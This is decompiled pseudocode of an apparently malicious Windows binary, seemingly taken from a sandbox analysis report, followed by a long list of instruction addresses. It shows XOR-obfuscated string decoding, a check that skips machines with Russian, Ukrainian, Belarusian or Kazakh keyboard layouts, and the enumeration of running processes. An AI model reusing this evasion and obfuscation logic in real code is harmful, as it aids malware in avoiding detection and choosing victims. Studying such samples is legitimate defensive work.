										 *0x43cde8 = _t341 ^ 0x0000002e;
										asm("movups [0x43cdd8], xmm1");
									}
									_t691 = _t690 - 0x18;
									_t548 = 0x43cdd8;
									_t618 = _t691;
									_t150 = _t548 + 1; // 0x43cdd9
									_t648 = _t150;
									 *_t618 = 0;
									_t618[4] = 0;
									_t618[5] = 0xf;
									do {
										_t342 =  *_t548;
										_t548 = _t548 + 1;
										__eflags = _t342;
									} while (_t342 != 0);
									_push(_t548 - _t648);
									E00402030(_t618, 0x43cdd8);
									_t344 = E00403D70(_t518,  &_v88);
									_t692 =  &(_t691[6]);
									_v48 = 0x2e6d;
									__eflags = _t344;
									_t345 =  *0x43cef0; // 0x0
									_v89 = _t344 != 0;
									__eflags = _t345 -  *((intOrPtr*)(_t635 + 4));
									if(_t345 >  *((intOrPtr*)(_t635 + 4))) {
										E0040D738(_t345, 0x43cef0);
										_t692 =  &(_t692[1]);
										__eflags =  *0x43cef0 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x437db0]");
											asm("movups [0x43cd74], xmm0");
											 *0x43cd84 = _v48;
											E0040DA4A( &_v88, __eflags, 0x42b490);
											E0040D6EE(0x43cef0);
											_t692 =  &(_t692[2]);
										}
									}
									__eflags =  *0x43cd85;
									if( *0x43cd85 != 0) {
										asm("movups xmm0, [0x43cd74]");
										_t445 = 0x10;
										asm("movaps xmm1, [0x437d50]");
										asm("pxor xmm1, xmm0");
										asm("movups [0x43cd74], xmm1");
										do {
											 *(_t445 + 0x43cd74) =  *(_t445 + 0x43cd74) ^ 0x0000002e;
											_t445 = _t445 + 1;
											__eflags = _t445 - 0x12;
										} while (_t445 < 0x12);
									}
									_t693 = _t692 - 0x18;
									_t552 = 0x43cd74;
									_t619 = _t693;
									_t160 = _t552 + 1; // 0x43cd75
									_t649 = _t160;
									 *_t619 = 0;
									_t619[4] = 0;
									_t619[5] = 0xf;
									do {
										_t346 =  *_t552;
										_t552 = _t552 + 1;
										__eflags = _t346;
									} while (_t346 != 0);
									_push(_t552 - _t649);
									E00402030(_t619, 0x43cd74);
									_t348 = E00403D70(_t518,  &_v88);
									_t688 =  &(_t693[6]);
									__eflags = _t348;
									if(_t348 == 0) {
										L89:
										_t646 = 0;
										__eflags = 0;
									} else {
										__eflags = _v90;
										if(_v90 == 0) {
											goto L89;
										} else {
											__eflags = _v89;
											if(_v89 == 0) {
												goto L89;
											} else {
												_t646 = 1;
											}
										}
									}
									_t620 = _v68;
									__eflags = _t620 - 0x10;
									if(_t620 < 0x10) {
										L94:
										 *[fs:0x0] = _v36;
										_pop(_t636);
										_pop(_t650);
										__eflags = _v44 ^ _t667;
										return E0040D3AF(_t646, _t518, _v44 ^ _t667, _t620, _t636, _t650);
									} else {
										_t560 = _v88;
										_t620 = _t620 + 1;
										_t351 = _t560;
										__eflags = _t620 - 0x1000;
										if(_t620 < 0x1000) {
											L93:
											_push(_t620);
											E0040D5EF(_t560);
											goto L94;
										} else {
											_t560 =  *(_t560 - 4);
											_t620 = _t620 + 0x23;
											__eflags = _t351 - _t560 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L96;
											} else {
												goto L93;
											}
										}
									}
								} else {
									_t593 = _v120;
									_t627 = _t615 + 1;
									_t462 = _t593;
									__eflags = _t627 - 0x1000;
									if(_t627 < 0x1000) {
										L59:
										_push(_t627);
										E0040D5EF(_t593);
										_t688 =  &(_t688[2]);
										goto L60;
									} else {
										_t560 =  *(_t593 - 4);
										_t620 = _t627 + 0x23;
										__eflags = _t462 - _t560 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											E00411D17(_t518, _t560, _t620, __eflags);
											L96:
											E00411D17(_t518, _t560, _t620, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t518);
											_t520 = _t688;
											_t699 = (_t688 - 0x00000008 & 0xfffffff8) + 4;
											_push(_t667);
											_v580 = _t520[1];
											_t670 = _t699;
											_push(0xffffffff);
											_push(0x42ad42);
											_push( *[fs:0x0]);
											_push(_t520);
											_t700 = _t699 - 0x630;
											_t357 =  *0x43b054; // 0x41d6575c
											_t358 = _t357 ^ _t670;
											_v604 = _t358;
											_push(_t646);
											_push(_t635);
											_push(_t358);
											 *[fs:0x0] =  &_v596;
											_t651 = _t560;
											_v2140 = _t651;
											_v2180 = _t651;
											asm("xorps xmm0, xmm0");
											_v2144 = 0;
											asm("movq [esi], xmm0");
											 *(_t651 + 8) = 0;
											 *_t651 = 0;
											 *(_t651 + 4) = 0;
											 *(_t651 + 8) = 0;
											_v588 = 0;
											_v2144 = 1;
											_t361 = GetKeyboardLayoutList(0x400,  &_v2136);
											_t637 = 0;
											_v2140 = _t361;
											__eflags = _t361;
											if(_t361 <= 0) {
												L109:
												 *[fs:0x0] = _v48;
												_pop(_t638);
												_pop(_t652);
												__eflags = _v56 ^ _t670;
												return E0040D3AF(_t651, _t520, _v56 ^ _t670, _t620, _t638, _t652);
											} else {
												do {
													_t364 =  *(_t670 + _t637 * 4 - 0x610) & 0x0000ffff;
													_v1600 = _t364;
													GetLocaleInfoA(_t364, 2,  &_v564, 0x1f4);
													_t366 =  &_v564;
													_v1628 = 0;
													_v1612 = 0;
													_t621 = _t366 + 1;
													_v1608 = 0xf;
													_v1628 = 0;
													do {
														_t566 =  *_t366;
														_t366 = _t366 + 1;
														__eflags = _t566;
													} while (_t566 != 0);
													_push(_t366 - _t621);
													E00402030( &_v1628,  &_v564);
													_t568 = _v1600;
													_v1604 = _t568;
													_v40 = 1;
													_t370 =  *(_t651 + 4);
													__eflags = _t370 -  *(_t651 + 8);
													if(_t370 ==  *(_t651 + 8)) {
														_push( &_v1628);
														_push(_t370);
														E0040B430(_t520, _t651, _t637, _t651);
														_t620 = _v1608;
													} else {
														asm("movups xmm0, [ebp-0x638]");
														_t620 = 0xf;
														_v1628 = 0;
														asm("movups [eax], xmm0");
														asm("movq xmm0, [ebp-0x628]");
														asm("movq [eax+0x10], xmm0");
														 *(_t370 + 0x18) = _t568;
														 *(_t651 + 4) =  *(_t651 + 4) + 0x1c;
													}
													_v40 = 0;
													__eflags = _t620 - 0x10;
													if(_t620 < 0x10) {
														goto L108;
													} else {
														_t571 = _v1628;
														_t620 = _t620 + 1;
														_t372 = _t571;
														__eflags = _t620 - 0x1000;
														if(_t620 < 0x1000) {
															L107:
															_push(_t620);
															E0040D5EF(_t571);
															_t700 = _t700 + 8;
															goto L108;
														} else {
															_t571 =  *(_t571 - 4);
															_t620 = _t620 + 0x23;
															__eflags = _t372 - _t571 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																E00411D17(_t520, _t571, _t620, __eflags);
																asm("int3");
																_push(_t670);
																_t672 = _t700;
																_push(0xffffffff);
																_push(0x42ad85);
																_push( *[fs:0x0]);
																_t703 = _t700 - 0x5c;
																_t378 =  *0x43b054; // 0x41d6575c
																_t379 = _t378 ^ _t672;
																_v2216 = _t379;
																_push(_t520);
																_push(_t651);
																_push(_t637);
																_push(_t379);
																 *[fs:0x0] =  &_v2212;
																_t522 = 0;
																_t572 =  &_v2236;
																asm("xorps xmm0, xmm0");
																_v2272 = 0;
																asm("movq [ebp-0x24], xmm0");
																_v2228 = 0;
																L97();
																_v2204 = 0;
																_t381 = _v2232;
																_t639 = _v2236;
																_v2276 = _t381;
																__eflags = _t639 - _t381;
																if(_t639 == _t381) {
																	L138:
																	_t523 = 0;
																	__eflags = 0;
																	goto L139;
																} else {
																	_v64 = 0x5d5d5b7c;
																	_v60 = 0x2e404f47;
																	_t658 =  *( *[fs:0x2c]);
																	_v120 = _t658;
																	do {
																		E0040A490(_t522,  &_v104, _t620, _t639, _t639);
																		_v80 =  *((intOrPtr*)(_t639 + 0x18));
																		_v44 = 1;
																		_t414 =  *0x43ce9c; // 0x0
																		__eflags = _t414 -  *((intOrPtr*)(_t658 + 4));
																		if(_t414 >  *((intOrPtr*)(_t658 + 4))) {
																			E0040D738(_t414, 0x43ce9c);
																			_t703 = _t703 + 4;
																			__eflags =  *0x43ce9c - 0xffffffff;
																			if(__eflags == 0) {
																				_t232 =  &_v64; // 0x5d5d5b7c
																				 *0x43ce6c =  *_t232;
																				_t233 =  &_v60; // 0x2e404f47
																				 *0x43ce70 =  *_t233;
																				E0040DA4A( &_v104, __eflags, 0x42b510);
																				E0040D6EE(0x43ce9c);
																				_t703 = _t703 + 8;
																			}
																		}
																		_t415 =  *0x43ce73; // 0x0
																		__eflags = _t415;
																		if(_t415 != 0) {
																			 *0x43ce6c =  *0x43ce6c ^ 0x0000002e;
																			 *0x43ce6d =  *0x43ce6d ^ 0x0000002e;
																			 *0x43ce6e =  *0x43ce6e ^ 0x0000002e;
																			 *0x43ce6f =  *0x43ce6f ^ 0x0000002e;
																			 *0x43ce70 =  *0x43ce70 ^ 0x0000002e;
																			 *0x43ce71 =  *0x43ce71 ^ 0x0000002e;
																			 *0x43ce72 =  *0x43ce72 ^ 0x0000002e;
																			_t439 = _t415 ^ 0x0000002e;
																			__eflags = _t439;
																			 *0x43ce73 = _t439;
																		}
																		_t416 = 0x43ce6c;
																		_v144 = 0;
																		_v128 = 0;
																		_v124 = 0xf;
																		_t237 =  &(_t416[1]); // 0x43ce6d
																		_t626 = _t237;
																		do {
																			_t589 =  *_t416;
																			_t416 =  &(_t416[1]);
																			__eflags = _t589;
																		} while (_t589 != 0);
																		_push(_t416 - _t626);
																		E00402030( &_v144, 0x43ce6c);
																		_t651 = _v104;
																		_t620 = _v88;
																		__eflags = _v124 - 0x10;
																		_v112 = _t522 | 0x00000001;
																		_t523 = _v144;
																		_t420 =  >=  ? _t523 :  &_v144;
																		__eflags = _v84 - 0x10;
																		_t572 =  >=  ? _t651 :  &_v104;
																		_t421 = E00402180(_t572, _t620, _t572,  >=  ? _t523 :  &_v144, _v128);
																		_t703 = _t703 + 0xc;
																		__eflags = _t421 - 0xffffffff;
																		if(_t421 != 0xffffffff) {
																			L122:
																			_v105 = 1;
																		} else {
																			__eflags = _v84 - 0x10;
																			_t620 = _v88;
																			_t572 =  >=  ? _t651 :  &_v104;
																			_t438 = E00402180(_t572, _t620, _t572, 0x437a5c, 7);
																			_t703 = _t703 + 0xc;
																			_v105 = 0;
																			__eflags = _t438 - 0xffffffff;
																			if(_t438 != 0xffffffff) {
																				goto L122;
																			}
																		}
																		_v112 = _v112 & 0xfffffffe;
																		_t422 = _v124;
																		__eflags = _t422 - 0x10;
																		if(_t422 < 0x10) {
																			L127:
																			__eflags = _v105;
																			if(_v105 != 0) {
																				L143:
																				_t423 = _v84;
																				__eflags = _t423 - 0x10;
																				if(_t423 < 0x10) {
																					L147:
																					_t639 = _v76;
																					_t523 = 1;
																					L139:
																					__eflags = _t639;
																					if(_t639 == 0) {
																						L149:
																						 *[fs:0x0] = _v52;
																						_pop(_t640);
																						_pop(_t653);
																						_pop(_t524);
																						__eflags = _v56 ^ _t672;
																						return E0040D3AF(_t523, _t524, _v56 ^ _t672, _t620, _t640, _t653);
																					} else {
																						_push(_t572);
																						E0040BB70(_t523, _t639, _v72, _t639, _t651);
																						_t654 = _v76;
																						_t705 = _t703 + 4;
																						_t620 = (0x92492493 * (_v68 - _t654) >> 0x20) + _v68 - _t654 >> 4;
																						_t390 = _t654;
																						_t582 = ((_t620 >> 0x1f) + _t620) * 8 - (_t620 >> 0x1f) + _t620 << 2;
																						__eflags = _t582 - 0x1000;
																						if(_t582 < 0x1000) {
																							L148:
																							_push(_t582);
																							E0040D5EF(_t654);
																							goto L149;
																						} else {
																							_t654 =  *((intOrPtr*)(_t654 - 4));
																							_t582 = _t582 + 0x23;
																							__eflags = _t390 - _t654 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								E00411D17(_t523, _t582, _t620, __eflags);
																								goto L151;
																							} else {
																								goto L148;
																							}
																						}
																					}
																				} else {
																					_t279 = _t423 + 1; // 0x11
																					_t572 = _t279;
																					_t424 = _t651;
																					__eflags = _t572 - 0x1000;
																					if(_t572 < 0x1000) {
																						L146:
																						_push(_t572);
																						E0040D5EF(_t651);
																						_t703 = _t703 + 8;
																						goto L147;
																					} else {
																						_t654 =  *((intOrPtr*)(_t651 - 4));
																						_t582 = _t572 + 0x23;
																						__eflags = _t424 - _t654 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L151;
																						} else {
																							goto L146;
																						}
																					}
																				}
																			} else {
																				_t428 = _v80;
																				__eflags = _t428 - 0x419;
																				if(_t428 == 0x419) {
																					goto L143;
																				} else {
																					__eflags = _t428 - 0x422;
																					if(_t428 == 0x422) {
																						goto L143;
																					} else {
																						__eflags = _t428 - 0x423;
																						if(_t428 == 0x423) {
																							goto L143;
																						} else {
																							__eflags = _t428 - 0x43f;
																							if(_t428 == 0x43f) {
																								goto L143;
																							} else {
																								_v44 = 0;
																								_t429 = _v84;
																								__eflags = _t429 - 0x10;
																								if(_t429 < 0x10) {
																									goto L136;
																								} else {
																									_t263 = _t429 + 1; // 0x11
																									_t572 = _t263;
																									_t430 = _t651;
																									__eflags = _t572 - 0x1000;
																									if(_t572 < 0x1000) {
																										L135:
																										_push(_t572);
																										E0040D5EF(_t651);
																										_t703 = _t703 + 8;
																										goto L136;
																									} else {
																										_t654 =  *((intOrPtr*)(_t651 - 4));
																										_t582 = _t572 + 0x23;
																										__eflags = _t430 - _t654 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L151;
																										} else {
																											goto L135;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t256 = _t422 + 1; // 0x11
																			_t572 = _t256;
																			_t434 = _t523;
																			__eflags = _t572 - 0x1000;
																			if(_t572 < 0x1000) {
																				L126:
																				_push(_t572);
																				E0040D5EF(_t523);
																				_t651 = _v104;
																				_t703 = _t703 + 8;
																				goto L127;
																			} else {
																				_t523 =  *(_t523 - 4);
																				_t582 = _t572 + 0x23;
																				__eflags = _t434 - _t523 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					L151:
																					E00411D17(_t523, _t582, _t620, __eflags);
																					asm("int3");
																					asm("int3");
																					_push(_t672);
																					_t674 = _t705;
																					_t396 =  *0x43b054; // 0x41d6575c
																					_v2328 = _t396 ^ _t674;
																					_push(_t654);
																					_push(_t639);
																					_t641 = _t582;
																					_v2596 = _t641;
																					_v2596 = _t641;
																					_t398 =  *0x437a6c; // 0x3e
																					asm("movq xmm0, [0x437a64]");
																					_v2580 = _t398;
																					asm("movq [ebp-0x108], xmm0");
																					E0040F2F0(_t641,  &_v2578, 0, 0xfa);
																					_t656 = OpenProcess(0x410, 0, _t620);
																					__eflags = _t656;
																					if(_t656 != 0) {
																						_t409 =  &_v316;
																						__imp__K32EnumProcessModules(_t656, _t409, 4,  &_v312); // executed
																						__eflags = _t409;
																						if(_t409 != 0) {
																							__imp__K32GetModuleBaseNameA(_t656, _v316,  &_v308, 0x104); // executed
																						}
																					}
																					FindCloseChangeNotification(_t656); // executed
																					_t583 =  &_v308;
																					 *_t641 = 0;
																					_t641[4] = 0;
																					_t625 = _t583 + 1;
																					_t641[5] = 0xf;
																					 *_t641 = 0;
																					do {
																						_t403 =  *_t583;
																						_t583 = _t583 + 1;
																						__eflags = _t403;
																					} while (_t403 != 0);
																					_push(_t583 - _t625);
																					E00402030(_t641,  &_v308);
																					_pop(_t642);
																					__eflags = _v48 ^ _t674;
																					_pop(_t657);
																					return E0040D3AF(_t641, _t523, _v48 ^ _t674, _t625, _t642, _t657);
																				} else {
																					goto L126;
																				}
																			}
																		}
																		goto L158;
																		L136:
																		_t522 = _v112;
																		_t639 = _t639 + 0x1c;
																		_t658 = _v120;
																		__eflags = _t639 - _v116;
																	} while (_t639 != _v116);
																	_t639 = _v76;
																	goto L138;
																}
															} else {
																goto L107;
															}
														}
													}
													goto L158;
													L108:
													_t637 = _t637 + 1;
													__eflags = _t637 - _v1592;
												} while (_t637 < _v1592);
												goto L109;
											}
										} else {
											goto L59;
										}
									}
								}
							} else {
								goto L13;
							}
						}
					}
				}
				L158:
			}

0x00403d70
0x00403d71
0x00403d79
0x00403d80
0x00403d84
0x00403d86
0x00403d88
0x00403d93
0x00403d94
0x00403d95
0x00403d9b
0x00403da0
0x00403da2
0x00403da5
0x00403da6
0x00403da7
0x00403dab
0x00403db1
0x00403db8
0x00403dbb
0x00403dc0
0x00403dc7
0x00403dce
0x00403dd5
0x00403de0
0x00403de4
0x00403de9
0x00403ded
0x00403df2
0x00403dfa
0x00403e23
0x00403e35
0x00403dfc
0x00403e02
0x00403e05
0x00403e0d
0x00403e11
0x00403e15
0x00403e15
0x00403e47
0x00403e53
0x00403e58
0x00403f3b
0x00403f3b
0x00403f3e
0x00403f41
0x00403f49
0x00403fc8
0x00403fc8
0x00000000
0x00403f50
0x00403f50
0x00403f54
0x00403f63
0x00403f6e
0x00403f71
0x00403f74
0x00403f79
0x00403f7e
0x00403f84
0x00403f87
0x00000000
0x00000000
0x00403f90
0x00403fbd
0x00403fbd
0x00403fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00403f92
0x00403f92
0x00403f92
0x00403f95
0x00403f9d
0x00403fb3
0x00403fb3
0x00403fb5
0x00403fba
0x00000000
0x00403f9f
0x00403f9f
0x00403fa2
0x00403fad
0x00000000
0x00000000
0x00000000
0x00000000
0x00403fad
0x00403f9d
0x00000000
0x00403f90
0x004040a7
0x004040aa
0x004040d3
0x004040d3
0x00403fca
0x00403fca
0x00403fd0
0x00403ffe
0x00403ffe
0x00404001
0x00404008
0x0040400f
0x00404015
0x0040407f
0x0040407f
0x00404085
0x004040e7
0x004040ec
0x004040f4
0x004040f5
0x00404106
0x00404087
0x00404087
0x0040408a
0x0040408b
0x00404093
0x004040dd
0x004040dd
0x004040df
0x00000000
0x00404095
0x00404095
0x00404098
0x004040a3
0x00000000
0x004040a5
0x00000000
0x004040a5
0x004040a3
0x00404093
0x00404017
0x0040401a
0x0040401b
0x00404028
0x0040402b
0x00404032
0x0040403f
0x00404041
0x0040404a
0x00404060
0x00404060
0x00404062
0x00404067
0x0040406a
0x00404071
0x00404078
0x00000000
0x0040404c
0x0040404c
0x0040404f
0x0040405a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040405a
0x0040404a
0x00403fd2
0x00403fd2
0x00403fd5
0x00403fd6
0x00403fde
0x00403ff4
0x00403ff4
0x00403ff6
0x00403ffb
0x00000000
0x00403fe0
0x00403fe0
0x00403fe3
0x00403fee
0x00000000
0x00000000
0x00000000
0x00000000
0x00403fee
0x00403fde
0x004040ac
0x004040ac
0x004040ac
0x004040af
0x004040b1
0x004040b7
0x004040c9
0x004040c9
0x004040cb
0x004040d0
0x00000000
0x004040b9
0x004040b9
0x004040bc
0x004040c4
0x004040c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004040c7
0x004040b7
0x004040aa
0x00403e5e
0x00403e5e
0x00403e5e
0x00403e92
0x00403e92
0x00403e92
0x00403e94
0x00403e95
0x00403e9e
0x00403ea6
0x00403eab
0x00403eaf
0x00403eb5
0x00403ee0
0x00403ee1
0x00403ee5
0x00403eea
0x00403eb7
0x00403eb7
0x00403ebb
0x00403ec1
0x00403ec6
0x00403eca
0x00403ecd
0x00403ed2
0x00403ed7
0x00403ed7
0x00403eed
0x00403ef4
0x00403f22
0x00403f2e
0x00403e70
0x00403e70
0x00403e76
0x00403e7d
0x00403e84
0x00403e87
0x00403e8e
0x00000000
0x00403f34
0x00403f35
0x00000000
0x00403f35
0x00403ef6
0x00403ef6
0x00403ef9
0x00403efa
0x00403f02
0x00403f18
0x00403f18
0x00403f1a
0x00403f1f
0x00000000
0x00403f04
0x00403f04
0x00403f07
0x00403f12
0x00404107
0x00404107
0x0040410c
0x0040410c
0x00404111
0x00404112
0x00404113
0x00404114
0x00404115
0x00404116
0x00404117
0x00404118
0x00404119
0x0040411a
0x0040411b
0x0040411c
0x0040411d
0x0040411e
0x0040411f
0x00404120
0x00404121
0x00404129
0x0040412c
0x00404130
0x00404134
0x00404136
0x00404138
0x00404143
0x00404144
0x00404145
0x00404148
0x0040414d
0x0040414f
0x00404152
0x00404153
0x00404154
0x00404158
0x00404164
0x0040416b
0x00404172
0x00404179
0x0040417b
0x00404180
0x00404186
0x0040418d
0x00404192
0x00404195
0x0040419c
0x0040419e
0x004041ab
0x004041b3
0x004041b8
0x004041c5
0x004041ca
0x004041ca
0x0040419c
0x004041cd
0x004041d4
0x004041d6
0x004041d6
0x004041e0
0x004041e0
0x004041e7
0x004041e8
0x004041e8
0x004041e0
0x004041ed
0x004041f2
0x004041f9
0x00404200
0x00404207
0x0040420b
0x0040420b
0x00404210
0x00404210
0x00404212
0x00404213
0x00404213
0x00404219
0x00404222
0x00404227
0x00404231
0x00404235
0x0040423a
0x0040423f
0x00404241
0x00404248
0x0040424a
0x00404251
0x00404254
0x0040425b
0x0040425f
0x0040425f
0x00404262
0x00404262
0x00404264
0x00404265
0x00404265
0x0040426b
0x00404270
0x00404275
0x00404279
0x0040427c
0x0040427f
0x004042ad
0x004042ad
0x004042b2
0x004042b7
0x004042be
0x004042c5
0x004042c9
0x004042cb
0x004042d0
0x004042d3
0x004042f6
0x004042fa
0x004042fd
0x00404300
0x00404302
0x004042d5
0x004042d5
0x004042db
0x004042de
0x004042e2
0x004042e4
0x004042e7
0x004042e8
0x004042ed
0x004042f0
0x004042f0
0x00404307
0x0040430c
0x00404313
0x0040431a
0x0040431e
0x00404324
0x0040432b
0x00404330
0x00404333
0x0040433a
0x0040433c
0x00404349
0x00404351
0x00404356
0x00404363
0x00404368
0x00404368
0x0040433a
0x0040436b
0x00404370
0x00404372
0x00404374
0x0040437b
0x00404382
0x00404389
0x00404390
0x00404397
0x0040439e
0x004043a5
0x004043ac
0x004043ac
0x004043ae
0x004043ae
0x004043b3
0x004043b6
0x004043bb
0x004043bd
0x004043bd
0x004043c0
0x004043c6
0x004043cd
0x004043d4
0x004043d4
0x004043d6
0x004043d7
0x004043d7
0x004043dd
0x004043e5
0x004043ed
0x004043f2
0x004043f5
0x004043f9
0x004043fb
0x00404400
0x00404404
0x0040440a
0x00404411
0x00404416
0x00404419
0x00404420
0x00404422
0x00404431
0x00404438
0x0040443d
0x0040444a
0x0040444f
0x0040444f
0x00404420
0x00404452
0x00404457
0x00404459
0x0040445b
0x00404464
0x0040446b
0x0040446f
0x00404474
0x00404474
0x0040447b
0x0040447e
0x00404483
0x00404485
0x00404485
0x00404488
0x0040448e
0x00404495
0x004044a0
0x004044a0
0x004044a2
0x004044a3
0x004044a3
0x004044a9
0x004044b1
0x004044b9
0x004044be
0x004044c1
0x004044c7
0x004044c9
0x004044ce
0x004044d2
0x004044d8
0x004044df
0x004044e4
0x004044e7
0x004044ee
0x004044f0
0x00404500
0x00404507
0x0040450d
0x0040451a
0x0040451f
0x0040451f
0x004044ee
0x00404522
0x00404529
0x0040452b
0x00404532
0x00404537
0x0040453e
0x00404542
0x00404550
0x00404550
0x00404557
0x00404558
0x00404558
0x00404550
0x0040455d
0x00404560
0x00404565
0x00404567
0x00404567
0x0040456a
0x00404570
0x00404577
0x00404580
0x00404580
0x00404582
0x00404583
0x00404583
0x00404589
0x00404591
0x00404599
0x0040459e
0x004045a1
0x004045a3
0x004045b8
0x004045b8
0x004045b8
0x004045a5
0x004045a5
0x004045a9
0x00000000
0x004045ab
0x004045ab
0x004045af
0x00000000
0x004045b1
0x004045b1
0x004045b1
0x004045af
0x004045a9
0x004045ba
0x004045bd
0x004045c0
0x004045ea
0x004045ef
0x004045f7
0x004045f8
0x004045fc
0x00404609
0x004045c2
0x004045c2
0x004045c5
0x004045c6
0x004045c8
0x004045ce
0x004045e0
0x004045e0
0x004045e2
0x00000000
0x004045d0
0x004045d0
0x004045d3
0x004045db
0x004045de
0x00000000
0x00000000
0x00000000
0x00000000
0x004045de
0x004045ce
0x00404281
0x00404281
0x00404284
0x00404285
0x00404287
0x0040428d
0x004042a3
0x004042a3
0x004042a5
0x004042aa
0x00000000
0x0040428f
0x0040428f
0x00404292
0x0040429a
0x0040429d
0x0040460a
0x0040460f
0x0040460f
0x00404614
0x00404615
0x00404616
0x00404617
0x00404618
0x00404619
0x0040461a
0x0040461b
0x0040461c
0x0040461d
0x0040461e
0x0040461f
0x00404620
0x00404621
0x00404629
0x0040462c
0x00404630
0x00404634
0x00404636
0x00404638
0x00404643
0x00404644
0x00404645
0x0040464b
0x00404650
0x00404652
0x00404655
0x00404656
0x00404657
0x0040465b
0x00404661
0x00404663
0x00404669
0x0040466f
0x00404672
0x0040467c
0x00404680
0x00404687
0x0040468d
0x00404694
0x004046a1
0x004046ae
0x004046b8
0x004046be
0x004046c0
0x004046c6
0x004046c8
0x004047da
0x004047df
0x004047e7
0x004047e8
0x004047ec
0x004047f9
0x004046d0
0x004046d0
0x004046d0
0x004046e7
0x004046ed
0x004046f3
0x004046f9
0x00404703
0x0040470d
0x00404710
0x0040471a
0x00404721
0x00404721
0x00404723
0x00404724
0x00404724
0x00404730
0x00404738
0x0040473d
0x00404743
0x00404749
0x00404750
0x00404753
0x00404756
0x0040478a
0x0040478b
0x0040478e
0x00404793
0x00404758
0x00404758
0x0040475f
0x00404764
0x0040476b
0x0040476e
0x00404776
0x0040477b
0x0040477e
0x0040477e
0x00404799
0x0040479d
0x004047a0
0x00000000
0x004047a2
0x004047a2
0x004047a8
0x004047a9
0x004047ab
0x004047b1
0x004047c3
0x004047c3
0x004047c5
0x004047ca
0x00000000
0x004047b3
0x004047b3
0x004047b6
0x004047be
0x004047c1
0x004047fa
0x004047ff
0x00404800
0x00404801
0x00404803
0x00404805
0x00404810
0x00404811
0x00404814
0x00404819
0x0040481b
0x0040481e
0x0040481f
0x00404820
0x00404821
0x00404825
0x0040482b
0x0040482d
0x00404830
0x00404833
0x00404836
0x0040483b
0x0040483e
0x00404843
0x00404846
0x00404849
0x0040484c
0x0040484f
0x00404851
0x00404a65
0x00404a65
0x00404a65
0x00000000
0x00404857
0x0040485d
0x00404864
0x0040486b
0x0040486d
0x00404870
0x00404874
0x0040487c
0x0040487f
0x00404883
0x00404888
0x0040488e
0x00404895
0x0040489a
0x0040489d
0x004048a4
0x004048a6
0x004048a9
0x004048ae
0x004048b6
0x004048bb
0x004048c8
0x004048cd
0x004048cd
0x004048a4
0x004048d0
0x004048d5
0x004048d7
0x004048d9
0x004048e0
0x004048e7
0x004048ee
0x004048f5
0x004048fc
0x00404903
0x0040490a
0x0040490a
0x0040490c
0x0040490c
0x00404911
0x00404916
0x0040491d
0x00404924
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404933
0x0040493c
0x00404942
0x0040494a
0x00404950
0x00404959
0x0040495d
0x00404960
0x00404963
0x00404966
0x0040496b
0x0040496f
0x00404974
0x00404977
0x0040497a
0x004049a2
0x004049a2
0x0040497c
0x0040497c
0x00404983
0x00404988
0x00404991
0x00404996
0x00404999
0x0040499d
0x004049a0
0x00000000
0x00000000
0x004049a0
0x004049a6
0x004049aa
0x004049ad
0x004049b0
0x004049e0
0x004049e0
0x004049e4
0x00404ac0
0x00404ac0
0x00404ac3
0x00404ac6
0x00404aef
0x00404aef
0x00404af2
0x00404a67
0x00404a67
0x00404a69
0x00404b06
0x00404b0b
0x00404b13
0x00404b14
0x00404b15
0x00404b19
0x00404b23
0x00404a6f
0x00404a72
0x00404a75
0x00404a82
0x00404a85
0x00404a8e
0x00404aa1
0x00404aa3
0x00404aa6
0x00404aac
0x00404afc
0x00404afc
0x00404afe
0x00000000
0x00404aae
0x00404aae
0x00404ab1
0x00404ab9
0x00404abc
0x00404b24
0x00000000
0x00404abe
0x00000000
0x00404abe
0x00404abc
0x00404aac
0x00404ac8
0x00404ac8
0x00404ac8
0x00404acb
0x00404acd
0x00404ad3
0x00404ae5
0x00404ae5
0x00404ae7
0x00404aec
0x00000000
0x00404ad5
0x00404ad5
0x00404ad8
0x00404ae0
0x00404ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ae3
0x00404ad3
0x004049ea
0x004049ea
0x004049ed
0x004049f2
0x00000000
0x004049f8
0x004049f8
0x004049fd
0x00000000
0x00404a03
0x00404a03
0x00404a08
0x00000000
0x00404a0e
0x00404a0e
0x00404a13
0x00000000
0x00404a19
0x00404a19
0x00404a1d
0x00404a20
0x00404a23
0x00000000
0x00404a25
0x00404a25
0x00404a25
0x00404a28
0x00404a2a
0x00404a30
0x00404a46
0x00404a46
0x00404a48
0x00404a4d
0x00000000
0x00404a32
0x00404a32
0x00404a35
0x00404a3d
0x00404a40
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a40
0x00404a30
0x00404a23
0x00404a13
0x00404a08
0x004049fd
0x004049f2
0x004049b2
0x004049b2
0x004049b2
0x004049b5
0x004049b7
0x004049bd
0x004049d3
0x004049d3
0x004049d5
0x004049da
0x004049dd
0x00000000
0x004049bf
0x004049bf
0x004049c2
0x004049ca
0x004049cd
0x00404b29
0x00404b29
0x00404b2e
0x00404b2f
0x00404b30
0x00404b31
0x00404b39
0x00404b40
0x00404b43
0x00404b44
0x00404b45
0x00404b49
0x00404b4f
0x00404b55
0x00404b5b
0x00404b68
0x00404b78
0x00404b80
0x00404b96
0x00404b98
0x00404b9a
0x00404ba5
0x00404bad
0x00404bb3
0x00404bb5
0x00404bca
0x00404bca
0x00404bb5
0x00404bd1
0x00404bd7
0x00404bdd
0x00404be3
0x00404bea
0x00404bed
0x00404bf4
0x00404bf7
0x00404bf7
0x00404bf9
0x00404bfa
0x00404bfa
0x00404c06
0x00404c0a
0x00404c14
0x00404c15
0x00404c17
0x00404c20
0x00000000
0x00000000
0x00000000
0x004049cd
